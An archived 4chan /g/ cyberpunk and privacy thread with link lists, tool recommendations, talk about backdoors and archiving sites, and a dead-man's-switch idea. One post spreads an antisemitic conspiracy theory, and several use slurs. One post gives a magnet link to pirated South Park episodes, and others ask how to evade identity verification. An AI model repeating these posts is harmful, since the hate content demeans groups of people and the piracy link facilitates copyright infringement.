[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vm / vmg / vr / vrpg / vst / w / wg] [i / ic] [r9k / s4s / vip] [cm / hm / lgbt / y] [3 / aco / adv / an / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / pw / qst / sci / soc / sp / tg / toy / trv / tv / vp / vt / wsg / wsr / x / xs] [Settings] [Search] [Mobile] [Home]
Board
Settings Mobile Home
/g/ - Technology


Thread archived.
You cannot reply anymore.


[Advertise on 4chan]


File: 1577692975313.jpg (499 KB, 1920x1080)
499 KB JPG
>>108523814
"Arguing that you don't care about the right to privacy because you have nothing to hide is no different than saying you don't care about free speech because you have nothing to say."
--Edward Snowden

>Cyberpunk
The FAQ: https://archive.is/mkDpa
What is /cyb/erpunk?: https://pastebin.com/pmn9vzWZ
How do I into /cyb/erpunk?: https://pastebin.com/5tpNFQds
Huge list of cyberpunk media: https://archive.is/6pQt6
The cyberdeck: https://pastebin.com/7fE4BVBg
Cyberlife: https://jinteki.industries/files/cyberlife.7z
Bibliothek: https://www.mediafire.com/folder/4m5hd2065hde8/Bibliothek

>Privacy
Tools: https://www.privacyguides.org/en/tools/
Hitchhiker's Guide: https://anonymousplanet.org/guide/
Hardware: https://ryf.fsf.org/products
Frontends: https://igwiki.lyci.de/wiki/Privacy_friendly_frontends
OSINT Guide: https://inteltechniques.com/index.html
Firmware: https://libreboot.org/
RMS on Facebook: https://stallman.org/facebook.html
Have I Been Pwned: https://haveibeenpwned.com/

>Security
"Shit just got real": https://pastebin.com/rqrLK6X0
Cybersecurity basics: https://igwiki.lyci.de/wiki/Cybersecurity_-_/sec/_guide
Basics and armory: https://igwiki.lyci.de/wiki/Cybersecurity_-_basics_and_armory
Learning/News/CTFs: https://igwiki.lyci.de/wiki/Cybersecurity_-_Learning/News/CTFs
/sec/ PDFs: https://mega.nz/#F!zGJT1QQQ!O-8yiH845GN26ajAvkoLkA
EFF Surveillance Self-Defense: https://ssd.eff.org/
Other library: https://mega.nz/file/UCgEGAjb#rwNcnMAQCUUbSp8supsFvn9QEHCWUW86eLcZa16ZG4Y
>>
>>108656842
>Recommended operating systems
General purpose: Debian, Fedora, Arch Linux, Xubuntu, Linux Mint
Security focused: Qubes OS, Whonix, Tails, OpenBSD

>Recommended mobile operating systems
Android based: GrapheneOS, CalyxOS, DivestOS, LineageOS
Linux based: postmarketOS, PureOS

>Recommended browsers
Chromium based: Brave, Chromium (ungoogled)
Firefox based: Waterfox, Zen Browser, LibreWolf, Tor Browser
Firefox with Zero user.js: https://pastebin.com/4qVUGU9S

>Advanced content blocking
https://github.com/gorhill/uBlock/wiki/Blocking-mode:-medium-mode

>Browser tests
https://www.deviceinfo.me
https://dnsleaktest.com
https://librespeed.org
https://time.gov

>Recommended search engines
Brave Search, SearXNG, DuckDuckGo, Startpage

>Privacy oriented DNS
https://adguard-dns.io/en/welcome.html
https://nextdns.io
https://quad9.net

>Privacy oriented email
Proton Mail, Tuta, Mailbox Mail, Riseup, Disroot

>Recommended instant messengers
Signal, SimpleX Chat, Briar, Element

>BIOS replacement
https://coreboot.org
https://libreboot.org

>Resources
https://www.privacyguides.org
https://anonymousplanet.org/guide/
https://ssd.eff.org
https://ryf.fsf.org/products
https://haveibeenpwned.com
https://inteltechniques.com/workbook.html
https://eldritchdata.neocities.org
https://stallman.org/facebook.html
https://chromium.woolyss.com
>>
I love certs
>>
>>108657156

people rail on them, but there are few good ones
>>
Is everything backdoored?
https://www.theregister.com/2026/04/21/iran_claims_us_used_backdoors/
>>
Threadly reminder to go read Fisheye Placebo for more cyberpunk goodness!
>Vance just wanted to make the most out of his college experience under a totalitarian regime, and if that meant hacking into the university to assign himself a hot female roommate, then so be it. The last thing he expected was to be dragged into a crazy conspiracy to overthrow the government by his most-definitely-not-female roommate.

Archive
Chapter 1 Part 1
https://desuarchive.org/co/thread/138433030/
Chapter 4 Part 7 (latest)
https://desuarchive.org/co/thread/145447092/

https://www.yuumeiart.com/fisheye-placebo-chapters
>>
space cyberpunk!
https://www.youtube.com/watch?v=SGxz4LQfRpo
>>
>>108657955

yes
>>
>>108657955

This sounds sus. I bet there are pinholes in their firewalls that allow enough traffic in that the NSA/CyberCom can get access. Most software is buggy enough, but there are likely firmware backdoors as well.
>>
is the claude mythos thing gonna be super hype or will it suck
>>
>>108652365
>>The fact that the EU and the US have pushed/made these laws is disgusting.
>The OS itself does not verify your age, it just stores it. You can put in any arbitrary age value whatsoever. Applications/sites can then just read that value and go yes/no based on it. Much better than every website on the planet requiring ID checks.
A concern is that adults will have to give up their driver's license in order to buy or use a computer/OS. Then the OS or seller of the device will record that private information in a remote central database. It's like a gun registry, but for owning computers. The "Parents Decide Act" in the US is anti-privacy, as I've heard it wants to do such "age verification" by getting your government ID / driver's license.

>>108651898 (previous thread)
In the previous thread, I posted some crappy code to fix for a stupid thing which had no alternative; I used the API of the ENS Data website. I've updated it to fix for this bug:
>failed to resolve /ipns/ohlife.eth/: could not choose a decoder: no decoder registered for multicodec code 114 (0x72)
>https://discuss.ipfs.tech/t/i-cannot-access-file-using-ipns-hash/12963
>You need to use /ipns instead of /ipfs since you’re pulling IPNS data

Here's revision 2 of Python code for /lib/cgi-bin/dns-query :
https://bettersafethansorry.ddns.wtf/raw/MkhhMNYkEv5I84rHly3CXax4hbvWOIfAwRRHZ4LzVsY

(eth.limo may have censored that .eth site because it has large files, so they wanted a way to block it in order to not store relatively large files.)
>>
>>108658420
Cyberpunk can't be about space, that is just space opera not cyberpunk. Where are the punk elements?
>>
>>108660183
Just hype, AI is losing money and wasting a lot more
>>
Fuck the surveillance state.
>>
Surfing the web.
>>
>>108663590
Acid Burn sex
>>
>>108657955
>Is everything backdoored?
Probably
>https://www.theregister.com/2026/04/21/iran_claims_us_used_backdoors/
That is the stupidest article I have read all week. An entire article based on theories, hypotheses, guesses and raw propaganda from China. Simply put: they do not, as usual, have a clue.
China pushes conspiracy stuff to make people forget their own spy adventures, like the one in Africa, and that Huawei copied Cisco wholesale, which means China would have known of US backdoors. And it still doesn't explain how Israel was able to follow all the traffic cameras in Teheran, that feed must have exceeded 1 MB/s.
And disconnected from Internet? How come then that the traffic overlay in Google Maps still show updated traffic status?

There is a reason I quickly stopped reading that rag and I see things sure have not improved.
>>
>>108663977
So The Register is not a trustworthy source of tech news?
>>
>>108664174
It is neither trustworthy nor is it news. It is radioactive drivel pumped out on an industrial scale by clueless dudelets desperately attempting to sound cool. The world would be better off without the REg.
>>
>>108664236
What is a good alternative?
>>
>>108663590
She looks super cute!
>>
>>108662326

it's always been here, but now it's outsourcing to ai companies
>>
Reposting the updated Data Broker Removal Links:
https://pastebin.com/cDbDXQvh
https://pastebin.com/raw/cDbDXQvh
>>
>>108656842
any way to bypass facebooks need for a video selfie. i want to make an account but not give up a video of my face.
>>
>>108657955
Everything is backdoored by now. Either by the NSA, Mossad in Israel, or MSS in China. It all goes back to the Edomites with their HQ in Israel. I have seen news videos where the FBI doesn't use backdoors to track people down so apparently it is only for the highest levels of government to catch APTs who are a true threat to EOG(Edomite Occupied Government.) But you never knew when the feds are going to use the backdoors they could use it on you and you wouldn't know it. Then they can build a case against you for court. or just eliminate you.
>>
>>108668926
know*
>>
>>108656842
>https://archive.is/mkDpa
>https://archive.is/6pQt6
It's not loading.
>>
File: download.gif (8 KB, 48x48)
8 KB GIF
>>108668967
Since 4 hours ago until now, I've seen that archive.today doesn't load.

Trying its onionsite also fails (same picrel):
http://archiveiya74codqgiixo33q62qlrqtkgmcitqx5u2oeqnmn5bpcbiyd.onion/oQbgi

(Anyone else notice that since like a week ago archive.is can't capture URLs directly to a PNG/JPG/GIF? It can only capture it if it's an image in a webpage. Hope nothing bad happened...)
>>
>>108669010
It works now, since ~1 hour ago. The full links of >>108668967 are:
>https://archive.is/mkDpa -> https://archive.is/2025.06.26-194857/https://sizeof.cat/post/cyberpunk-faq/
>https://archive.is/6pQt6 -> https://archive.is/2025.08.18-152747/https://sizeof.cat/post/cyberpunk/
>>
>>108668967
>https://archive.is/mkDpa
It has been on and off for weeks now. Is there an alternative to this service?
>>
>>108668926

the feds are idiots and can't build a case to save their lives, but they falsify so much evidence that they can waste a ton of money.
>>
File: nat_sad-cat-10.jpg (151 KB, 1803x1197)
151 KB JPG
>my email, password, username was leaked on an Internet Archive breach in 2024
>today I got a legit Instagram password reset email that I didn't ask for
What do now? Is two-factor phone verification good enough to keep me safe?
>>
What software/hardware would be good to use at my cabin with no Internet? It will have two desktops, four thin clients, a nas and a router. One thin client will run home assistant and the desktops have Ubuntu and windows.
>>
>>108675651
You probably want a /ham/ radio system, HF and also satellite receivers.
>>
Did skunkyart dev die in Ukraine?
>>
>>108675651

Reticulum

It's a network stack that's used to form hardware-agnostic mesh networks across LANs and WANs. In order to work, it doesn't require:
- Internet
- ISPs
- routers
- TCP/IP

It does require encryption for all messages. It may require IPv6, a newer version of Android for Sideband to work (in Android), and Neighbor Discovery enabled in the router or maybe a virtual access point setup. Use it with wide-range radio communication hardware. Some links:
https://www.youtube.com/watch?v=XTnYVh7K6xQ
https://reticulum.network/
https://github.com/markqvist/Reticulum
https://github.com/markqvist/Reticulum/blob/master/Zen%20of%20Reticulum.md

I think I first heard about it from that "The Internet, Reinvented" video. Some Reticulum sites/nodes that I know about (in nomadnet):
- 253e67911a76125e2c0df30f75adf810:/page/index.mu = "0chan" = "anonymous mesh textboard"
- 22dcb397729a3a097a46a82afc27acc7:/page/index.mu = "IPFS gateway"
- 12cb1ed29943213839f0b0d18cd42761:/page/index.mu = "SP8KZW BBS Node" = dead?
- some other one which said you could access the web -- meaning HTTP(S) -- over Reticulum ("for free")
>>
File: mbasterd_screen.png (214 KB, 1052x687)
214 KB PNG
>>108660183
>>108661912
Today was maybe the first time I got slightly angry at GPT-5 mini at https://duck.ai/ . I asked it to help decode /tmp/megabasterd_folder_cache_uz410RTR.json created by https://github.com/tonikelope/megabasterd/tree/master - MegaBasterd is a thing to download mega.nz folders. The JSON looks like this:
>"f": [
>{
>"h": "Xq5BjCYC",
>"p": "2zJyTRhR",
>"u": "Bdp9fNK6Y_c",
>"t": 1,
>"a": "-tdzBrphQs0N5xv3X0BEinnVO-6QX_pl2NpiX28sl88",
>"k": "CjpRkByJ:t-7HVelmz[...]yTRhR:VrzH_ry28pJu3XY6TR_Khg",
"ts": 1772003246
>},[...]
f contains many nodes which generally fit that format. Then the JSON ends with:
>"sn": "cStx0PVyIjc",
>"st": "!P&04)b"

Many prompts and answers later, all I got was dogshit confidently incorrent results (Python code which all didn't work). This is a fairly involved process of applying mega.nz's system of decryption keys and so on. (Some of the text seems to be URL-safe Base64.) I want to decode this megabasterd_folder_cache file to get the actual filenames + other metadata; I am sure the models that are better than ChatGPT would also suck at helping me. They would suck somewhat less though.

I'm better off fumbling my way through the source code in GitHub and eventually failing or succeeding.
>>
File: Human Buy Something.png (41 KB, 1620x1593)
41 KB PNG
How do I enroll in Cyberpunk University
>>
>>108671641
>It has been on and off for weeks now. Is there an alternative to this service?
Does it have to be short links?

>>108677837
Thank you slop. More info: https://pastebin.com/cVM7YXZA
>>
File: qubes.png (27 KB, 1200x630)
27 KB PNG
>>108675651
>desktops have Ubuntu and windows
First mistake ever. Go Qubes or go home.
>>
>>108678617
Why not SculptOS?
>>
>>108675651
A nintendo DS
>>
does 3d printing things leave a trace?
>>
>>108681640
Unless you operate in clean room conditions, skin cells will be floating in the air and some will be embedded in the plastic and carry enough DNA to identify you.
>>
>>108681640
yes, it's a honeypot
>>
>>108680440
What is that?
>>
>>108681640

not like printer dots
>>
>>108683784
See
https://genode.org/download/index
>Sculpt is a Genode-based general-purpose OS. Our ready-to-use system images allow you to use Genode without the need to compile the system from scratch.
What makes it interesting is that
>The Genode OS Framework is a tool kit for building highly secure special-purpose operating systems. It scales from embedded systems with as little as 4 MB of memory to highly dynamic general-purpose workloads.
>Genode is based on a recursive system structure. Each program runs in a dedicated sandbox and gets granted only those access rights and resources that are needed for its specific purpose. Programs can create and manage sub-sandboxes out of their own resources, thereby forming hierarchies where policies can be applied at each level. The framework provides mechanisms to let programs communicate with each other and trade their resources, but only in strictly-defined manners. Thanks to this rigid regime, the attack surface of security-critical functions can be reduced by orders of magnitude compared to contemporary operating systems.
>>
Now that Ubuntu 26.04 LTS is here, I wonder how many will switch from Win10 to it or Kubuntu. Sadly, SerenityOS is not yet ready for showtime.
>>
>>108678504
>Does it have to be short links?
Not at all, it just has to be a working archiving system.
>>
>Bank
>Thief
>Theirf robs banks
>Cuck police are know to breach your rights
>Use geogrence to find theif
>Cuck police now know who everyone is in area
>They know you were in the area getting pegged
https://apnews.com/article/supreme-court-geofence-warrants-unreasonable-searches-constitution-a61c200a806cba89ded43685279eccae

How do you respond without sounding mad? Are there any pants manufacturers that make Faraday cage pockets?
>>
File: 1772795722448762.jpg (93 KB, 828x776)
93 KB JPG
>>108689200
So those geofences are active the whole time and they store all the data, truly disturbing.
>>
>>108656842
>>108687269
>>>archive.is has been on and off for weeks now. Is there an alternative to this service?
>>Does it have to be short links?
>Not at all, it just has to be a working archiving system.
archive.is kinda sucks! Reason: If you open a link -- such as that https://archive.is/mkDpa -- in Tor Browser then it forces you to solve a self-driving car captcha for FAGMAN. I refuse to solve those image ones where you have to select 8 out of 16 total cells which contain a bicycle (for example).

I downloaded https://archive.is/mkDpa and https://archive.is/6pQt6 via the SingleFile extension ( capture of https://sizeof.cat/post/cyberpunk-faq/ and https://sizeof.cat/post/cyberpunk/ respectively ). <s>Each webpage has a size of 1 MB to 2 MB. This matters for a reason stated below.</s>

Just spent 2.40 USD worth of ETH to get 144 MB of on-chain storage in Arweave. (Confetti was popping off in the webpage when it said "payment confirmed".)

Here's the replacements; for the below links in the bullet points, switch "arweave.net" to "morue.site" or whatever other ar:// gateway if needed):
- OP link archive.is/mkDpa -> https://arweave.net/raw/JLtwNn1lr2szwTO3V-Yp_rhbbPX1iQpD-GjWNO_TyF0
- OP link archive.is/6pQt6 -> https://arweave.net/raw/sZKcdH3NyMC_tMLMVak24ky1FMDMKIfrmLLGiX8Fs28

Whatever those webpages say will live on in that blockchain forever in at least ~100 miners' computers worldwide. Like IPFS gateways, there's a bunch of Arweave gateways. (Some work better than others; https://kt10.store/ mostly sucked and died, https://morue.site/ works well, etc.)

Fuck Archive.org and Wayback Machine; that site is ran by petty hypocritical pathetic trannies! (BTW, website sizeof.cat is excluded in web.archive.org.)
>>
File: urlstolen.png (257 KB, 1280x941)
257 KB PNG
>>108690152
funny image

>>108690455
>refuse to solve those image ones where you have to select 8 out of 16 total cells which contain a bicycle
Vague. Pic related is what I mean. I'm not solving this.

>there's a bunch of Arweave gateways
A benefit of the webpage being available at https://[multiple sites]/raw/ID is that once one puts up some stupid fucking Cloudflare / Annubis / Anit-bot / verify-you-are-human wall, then you can just use the website which doesn't do that. (IPFS also supports an open web in this way.)
>>
>>108687042
I'm on Xubuntu 26.04 and it's fantastic.
>>
>>108690455
Dang, I hope we get more archives because the internet is in a sorry state
>>
>>108690455
Do those chains work properly?
>>
>>108692074
They can be quite expensive and kill the water
>>
File: 1597423285159.jpg (20 KB, 475x515)
20 KB JPG
How do I go about reducing my "online attack surface"? I'm worried about the frequency of breaches and want to delete all the accounts for services I no longer use, or rarely ever use.

Assuming services still keep an up-to-date, last-updated copy that could hypothetically be accessed depending on how hard they were pwned, data poisoning would be in order--change any passwords that had been ignorantly used elsewhere, and changing the associated email with a soon-to-be-deleted throwaway. Any metadata they had collected, a data broker can clean up.

What would I do for accounts for which I've retardedly forgotten the password to, as well as the email? For old, long abandoned social media accounts, I can imagine platforms asking for a photo ID to verify my identity, which I will NOT concede to. I was thinking nuking the account with reports if there's no other option via official channels.

Data breaches aside, I'm also concerned with the way autocorrect could be used to more efficiently deanonymize people, or simply be used to link online identities to someone IRL via facial recognition--hence the desire to nuke any social media. No doubt governments have already used it, but I'm more concerned with the general populous getting access to such toys.
>>
Is there a relatively up to date dump somewhere of deceypted IPAs from the app store? I'm aware of services that offer one offs, but I want them all.
>>
sms verification service for gmail, github and discord?
>>
>>108692961
I dunno if these are outdated or not
>https://rentry.org/good-sites#sms-verification-sites

I think most services are well aware of online sms services where you buy a phone # for cheap, and have countermeasures for them. Verification might go through, but then at some some later point in time, your account gets nuked. Assuming you live in the states, why not just buy a prepaid phones?
>>
Is there a website where you can find info about what websites don't accept or shadowban which email domains when registering an account?

For example, I know that GitHub will restrict accounts created with @passinbox.com domain (the alias service of proton.me), you won't be able to fork repositories. In fact iirc after a while you'll get redirected to a page asking for phone number verification. But if you register with proton.me instead you'll be able to use the platform with complete features.
>>
>>108681665
>>108682204
>>108685528

I mean if you use say TOR and tails to download something off the internet could that be traced back to you?

not including anything physical.
>>
>>108693681
By download I mean something from a 3d printing website
>>
>>108692573
Why anyone use autocorrect? I always disable and uninstall the systems that make use of that.
>>
>>108692074
>Do those chains work properly?
Yeah. Arweave is legit and popular:
- official site: https://www.arweave.org/
- notability: https://www.wikidata.org/wiki/Q129196013
- explorer: https://viewblock.io/arweave = total size 44.23 PiB (as of today)

Arweave gateways work well too (especially the ones I wrote about). Here's another gateway:
https://0x0.io.vn/raw/fZXBEoRv4F7vjLAAjJZRmCk3oH6x2l_HsYLTHzoN2vU = https://a.4cdn.org/g/thread/108523814.json = previous /cyb/+/psg/ thread

How hard/easy is it to become a miner? Compared with other currencies:
- Easy: Monero mining.
- Medium: Arweave mining. Need at least 8 to 16 GB of RAM, terabytes of free storage space (may need to be on SSDs), may need a specific version of Ubuntu, need to mess with numeric limit of file descriptors, otherwise not so easy to get going. Need a medium-to-high-powered computer. Port forwarding in the router is NOT required.
- Hard: Filecoin mining (related to IPFS). Need at least 256 GB of RAM. Need at least 10 to 100 TB of free storage space. Need two high-powered computer working together, probably not just one doing everything. Port forwarding in the router is required.

>>108692551
>They can be quite expensive and kill the water
AI probably guzzles way more water than blockchains used in cryptocurrencies. Consider whether or not data center conditions (multiple high-powered computers) are required to mine the blockchain in question. Unlike Filecoin, you don't need to have your own fuckin' data center to mine Arweave.

Pic unrelated. Where's that one anon who posted in these threads about how much they hate America? An American I know and somewhat care about seems to have either donated to AIPAC or subscribed to their newsletter. What a dumb cunt, older Christfag brainwashed into worshipping Israel.
>>
>>108690455
>Arweave_yellow_paper_c.2018_page_21.jpg
Found that to be interesting:
>3.2.6 Data Permanence, Not Network Permanence
>
>All technologies come in cycles[10]. While the Arweave’s mechanism design is generally engineered to promote adaptivity to new circumstances, the core Arweave team does not expect that the network as it is currently formulated will continue to produce blocks in true perpetuity. This does not, however, mean that we expect that the information stored inside the weave will be lost after the final block is mined. It is our expectation that when eventually a permanent information storage system more suited to the challenges of the time emerges, the Arweave’s data will be ‘subsumed’ into this network. After the mining of the final block, the financial incentive mechanisms for data preservation will subside and give way to social incentives for data preservation. This effect will likely be compounded by the exceptionally low cost of storing the data from the network, due to its decreasing relative cost over time.
>
>This pattern of ‘nesting’ of archives when they are retired is common across human history. An archive of Gopherspace (a ‘knowledge web’[4], prior to the HTTP-based web[25]) can be found inside the Arweave’s permaweb. Inside the Gopherspace archive, one can find archives of earlier Telnet and

Attached pic = next page.

>>108694805
(In case there's any misunderstanding, by "autocorrect", that anon >108692573 means "AI / machine learning".)

>>108694817
>Need at least 256 GB of RAM
Even bigger joke nowadays, with memory costing so much due to sloppers.
>>
File: synopsis.jpg (55 KB, 362x512)
55 KB JPG
I happened upon this 2002 cyberpunk video game while looking through my Arweave files: "James Cameron's Dark Angel".

Info:
>https://www.wikidata.org/w/index.php?title=Q3702705&diff=2484877024&oldid=2473980695
>https://ardrive.net/raw/5RWD7P6CKAJhRPhYva6fbmk3bDto6-oXx4_75o4HbIs
Overview:
>Based on the hit series created by Academy Award® winner James Cameron and Charles H. Eglee. Dark Angel is the story of Max, a genetically enhanced soldier, who cunningly fights to reclaim her manipulated past and avoid capture through the underground landscape of post-apocalyptic Seattle. Her streetwise instincts and fearless hand-to-hand combat skills are crucial to her survival. Trusted cyber-journalist Logan Cele aids Max's quest to defeat -|- Corp, the secret organization that rose out of the ashes of Manticore, her military creator, and discover the truth of her past.
Wikipedia:
>The game follows an original storyline, with players controlling Max Guevara as she fights the I Corporation and attempts to find her twin sister.
>[It's based on an American TV series titled "Dark Angel".]

It's also mentioned in those sizeof.cat captures in the OP and >>108690455
>>
>>108695389

Dark Angel! That sure takes me back.
>>
>>108696526
Gene edited soldiers as a concept has never been as realistic as it is today. China is open about it but when will the US do the same?
>>
>>108696770
Agreed
>>108696770
Why would you want that?
>>
Cyberpunk moment in "House of Cards": some nerdy guy gained power due to his technological skills. A politician got someone to kill him so he couldn't get blackmailed or revealed by him (forgot the details of the story). The part that was interesting to me was how after he died an automated message went out to person(s) which said "If you're hearing this, I'm already dead. [Other part of his message.]" Getting killed by elites = in his threat model, so he prepared. How would you set up such a message?

First part: making some software/hardware detect if you're alive or not. If you often wear a heartbeat monitor, it could be easy. Otherwise, you could have some thing monitor if you interact with it on a daily or weekly basis. If you don't interact with it, it sends the message. Second part: sending the message. Could set up a thing to send a message to various IRC channels. There's a CLI-only IRC client, forgot what it's called. Of course, you could send out emails. I know of a file sharing where you can ul files likes this -- "cat f.txt | curl -T - http://forexample.com/upload" -- can be used in combination with other thing(s): may be hard for people to find the resulting link(s).

Maybe the best / most visible way would be to use YouTube's API to upload a video once the death happens. Could you other APIs and stuff to send such automated messages in social media or whatever. (Other consideration: is the message public or private/targeted?)

>>108696526
I never watched that TV show. Maybe I will in the future. (I see it in FMovies.)

>>108696770
>China is open about [Gene edited soldiers]
(Interesting. I haven't learned about that besides you saying that.)

>when will the US do the same?
Perhaps they are making super soldier with gene editing in secret. Reasons to not join the army/military in the US: you might die, you might get cancer or some other problems from DNA editing, you might die fighting in Iran due to Jewish influences over the US (this is a bad fate).
>>
>>108698779
>Could you other APIs
Could use other APIs

>Could set up a thing to send a message to various IRC channels.
Either torsocks doesn't work IRC client irssi, or one of these servers is blocking Tor connections:
>$ torsocks irssi --connect=irc.hackint.org --port=6697 # dead?
>$ torsocks irssi --connect=irc.libera.chat
This command worked: "irssi --connect=irc.libera.chat". Then make a cronjob with access to $DISPLAY / X server; make it run a macro to type in and submit "/join #libera" then "[your message here]".

That channel is dumb and gay as hell, wtf:
>19:59 -!- Topic for #libera: Welcome to Libera.Chat support | Trans Rights! | Not for politics, IRC drama, cryptocurrency, ban appeals, etc. | FAQ and guides: https://libera.chat/guides/faq | Need to PM staff? Find on-call staff with "/stats p" | Finding channels: https://libera.chat/guides/findingchannels | Advice for helpers: https://libera.chat/guides/helpers
>19:59 -!- Topic set by gAy_Dragon [A_D@libera/staff/dragon] [Tue Mar 31 04:30:50 2026]
>>
How do you connect to IRC channels via Tor? Do you use the web interface for IRC or something else? Also asking for that guy in the previous thread.

>>108698862
>Either torsocks doesn't work CLI-only IRC client irssi
Either torsocks doesn't work with CLI-only IRC client irssi

Typo correction again, my bad.
>>
>>108698885
Why use tor? I2P or bust!
>>
I need a piece of spy equipment for my corridor so I can rub one out without the deep state (my wife) catching me in the act. I think the best tool for the job would be a tiny motion sensor with a silent remote alarm, but strangely this seems to be impossible to find. Everything is for some sort of smart home nonsense or at best for sensor lights. Any suggestions?
>>
>>108699897
Motion sensors in rigs like picrel don't have much range. You're better off putting together a laser-photoreceiver rig.
>https://www.youtube.com/watch?v=t0FTzUhdg3w
Instead of a silent alarm, hook it up to a surround sound audio system and have it play gunshots kek.

Back when I was still in school and regularly tormented by junior glowniggers, I tried wiring these ultrasonic sensors to a rig that would pinch me whenever someone was behind me, like a sort of spider sense. By the time I felt anything, someone's hand was already on my neck.
>>
>>108700217
kek that'd be funny. I think the issue with that sensor is that its short range and easy to fool. Laser would be more useful
>>
>>108698779
House of Cards is a realistic cyberpunk world no doubt. Everyone is an asshole
>>
>>108694817
Fascinating stuff, I had never heard of it
>>
>>108676918
Isn't that thing pozzed?
>>
>>108698241
>Why would you want that?
Why people would want gene editing? Well, general health is a good starting point; health services take a large fraction of the national budget and then there is the work time lost due to health issues.
>>
>>108703754
Do you want Brave New World? Because that's how you get the plot from Brave New World and you won't be in the winning side
>>
Are there any good use cases for faraday bags besides crime? Like how do people use them regularly for privacy?
>>
>>108706126
To protect a room
>>
>>108706126

yeah, to prevent tracking by hackers and criminal glowies.
>>
>>108706126
To prevent tumors.
>>
I wished my pockets were Faraday bags which could be zipped closed. But then they have to get washed in a washing machine, so how would that work? Would the metal rust or oxidize due to that?

>>108706126
>Are there any good use cases for faraday bags
They're easy to use. If you put a smartphone in one to three layers of tinfoil it can't send or receive any phone calls. It can't communicate with cell towers. Problem is that it's not convenient to wrap up and unwrap it every time. With a Faraday bag you can easily open and close it, putting a device in or taking it out.

>>108706035
>Do you want Brave New World? Because that's how you get the plot from Brave New World and you won't be in the winning side
I suspect that greed with eventually win out. Maybe not today, maybe not in you country, but some place and time will do it, normalizing it for the rest of the world. Eventually corpos will use AI for slave labor. Eventually people will cave on gene editing in order to save money.

Parents are very stupid. They let their toddlers and babies have access to an iPad, with stuff like YouTube on autoplay playing. Part of the justification for recent age verification / anti-privacy laws is that parents are stupid so the government has to make laws to prevent idiot children from accessing stuff. Parents were too stupid to properly raise their kids, not letting them have a computer until they're 8 or something, not putting access controls on their stuff if they're worried about kids looking at porn.

Stupid parents has a big overlap with poor parents, and they may choose to do gene editing if they could.

This is a bit of a ramble; the first part seems truer than the last part.
>>
>>108706390

they sell pocket sized/shaped faraday bags so you can protect your keys and wallet from scammers.
>>
Is there some registry of open/non-private/non-I2P torrents which are watched by copyright trolls? It'd be cool to see a table with these columns (plus rows of contents):

Infohash ; Torrent name ; Record of DMCA email [telling you to stop downloading/sharing this] ; Notes [such as the name of the media if &dn= something simple like just "Season 1"]

Don't know if such a website exists. A similar site is https://www.suedbynintendo.com/ "Sued by Nintendo" which shows all the stuff that Nintendo tried to take down (many times succeeding). I know that torrents of American cartoons result in DMCA letters more than torrents of anime. Example: some "South Park" torrent. Here's a new "South Park" torrent (created a month or two ago) which isn't monitored by copyright cunts:

South.Park.S01-S12.NTSC.DVD (204.72 GB)
magnet:?xt=urn:btih:da390463f2e3cabeccf8031f4e321e065516b2b4&dn=South.Park.S01-S12.NTSC.DVD&xl=219822874624&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337%2Fannounce&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce

>>108707163
True fact. That's obvious when you point it (why didn't I think of that?).

Trigonometry fact that's "obvious when pointed out": the hypotenuse of the right triangle is the radius in the unit circle. (With H=1, sine=O/1=O, and cosine=A/1=A. Sine corresponds to one of the non-diagonal lines of the triangle, and cosine corresponds to the other one. Changing the angle basically traces out a circle, or at least 90 degrees of a circle.)
>>
>>108706390
I think maybe slaves won't be necessary if robots get cheap enough. Humans will become obsolete
>>
Anyone here took any cybersec certification
>>
>>108709613
Nah, certs are for pussies. Real men hack for the love of hacking
>>
>>108706035
>Do you want Brave New World?
Not really, but just as with Cyberpunk genre, we have in reality arrived at Brave New World. The elite just doesn't want to admit it or share their privileges.
>Because that's how you get the plot from Brave New World and you won't be in the winning side
Oh but I will be. Through my day time job I get into contact with various parts of the elite and frankly it is not impressive. There is a lot of greed, envy and demand for immediate gratification. The reason many are part of the elite is that they were born into it or have other forms of connection. There is little real meritocracy to be seen but they sure insist there is.
>>
>>108694863
>>Need at least 256 GB of RAM
>Even bigger joke nowadays, with memory costing so much due to sloppers.
I've heard that the RAM industry was considering if they should sell memory at all to the non-enterprise market. It would be ridiculous if they stopped selling to normal consumers, but I don't know all the economics at play here; they might make such a weird move.

A comment on this "“Just” a hard drive" video by Seagate Technology:
>https://www.youtube.com/watch?v=ZXs_9OXRnQo
>"Hey guys, check out the cool stuff we're developing. And now we're selling it to AI companies, not to you." [7.2K likes]

>>108709576
>I think maybe slaves won't be necessary if robots get cheap enough. Humans will become obsolete
I meant to say that when I said
>Eventually corpos will use AI for slave labor.
They'll use robots which use AI. Since they aren't human, they'll be used as slave labor since chattel slavery is illegal.

In order to make more money, Amazon wants to replace their human workers with AI robots as soon as possible.
>>
>>108657563
Any recommendations besides the obvious CISSP or OSCP?
>>
>>108706390
>I suspect that greed with eventually win out. Maybe not today, maybe not in you country, but some place and time will do it, normalizing it for the rest of the world.
Usually it does. Greed and fear are the two main drivers in finance. And while the elite will want the benefits for themselves, they will realise there is a major cost in not releasing the health benefits to the rest of the people. Noticed how the directors of Big Pharma never seem to live past 100?
>Eventually corpos will use AI for slave labor.
The progress in humanoid robots is impressive. It will be commonplace in 10 years, the question is if people will be employed and can afford AI robots.
>Eventually people will cave on gene editing in order to save money.
Some countries quicker than others. China will be early, conservative religious countries will not.
>Parents are very stupid. They let their toddlers and babies have access to an iPad, with stuff like YouTube on autoplay playing.
There is a huge span from the most brainless short sighted parnts to those who will do anything to secure their children's future. Also, whildren might soon grow up with robots as close friends.
>Stupid parents has a big overlap with poor parents, and they may choose to do gene editing if they could.
Imagine a future where everyone has an IQ of at least 105 at today's scale, without craving for immediate gratification, excellent health and 200 year lifespan. It will be a very different world from ours. This might be an exit from /cyb/ dystopia and into Solarpunk.
>This is a bit of a ramble; the first part seems truer than the last part.
That is why we are here.
>>
anyone know of good p2p blocklists (i.e. ip blocklists)?
>>
File: HackingPrinters=Based.gif (3.72 MB, 356x200)
3.72 MB GIF
>>108694817
>- explorer: https://viewblock.io/arweave = total size of 44.23 PiB (as of today)
That site kinda sucks:
- crimeflare anti-bot thing applies to everyone
- rate limited for two minutes if you quickly open ~8 links in the browser: they show GIFs like pic related on the "Rate Limited" webpage
